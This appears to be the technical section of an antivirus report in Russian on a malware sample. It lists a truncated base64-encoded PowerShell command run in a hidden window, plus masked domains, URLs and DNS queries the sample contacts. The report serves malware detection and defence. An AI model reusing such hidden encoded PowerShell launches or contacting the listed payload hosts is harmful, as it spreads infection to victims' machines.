Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABPAGEAeQBwAHoAZAB5AG8APQAnAEIAdgB2AGcAbQBpAGoAaABsAHQAawAnADsAJABHAHkAbwBxAHYAZwBsAGYAcwBwAHkAbgBqACAAPQAgACcANgA3ADEAJwA7ACQAWgBkAGsAYwBhAHQAeQBqAHAAdAA9ACcAVgBkAGgAcwBoAGsAcABhAHQAawB...
- 'io##.com':80
- 'le###757.com':443
- 'ta#######kita.chibikko-land.jp':80
- http://www.io##.com/etqgc/qjXGaKzbu/
- http://ta#######kita.chibikko-land.jp/wp/cymobgcq2-dzx-555/
- 'le###757.com':443
- DNS ASK io##.com
- DNS ASK me####spedia.com
- DNS ASK de#.#vatech.org
- DNS ASK le###757.com
- DNS ASK ta#######kita.chibikko-land.jp
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABPAGEAeQBwAHoAZAB5AG8APQAnAEIAdgB2AGcAbQBpAGoAaABsAHQAawAnADsAJABHAHkAbwBxAHYAZwBsAGYAcwBwAHkAbgBqACAAPQAgACcANgA3ADEAJwA7ACQAWgBkAGsAYwBhAHQAeQBqAHAAdAA9ACcAVgBkAGgAcwBoAGsAcABhAHQAawB...' (со скрытым окном)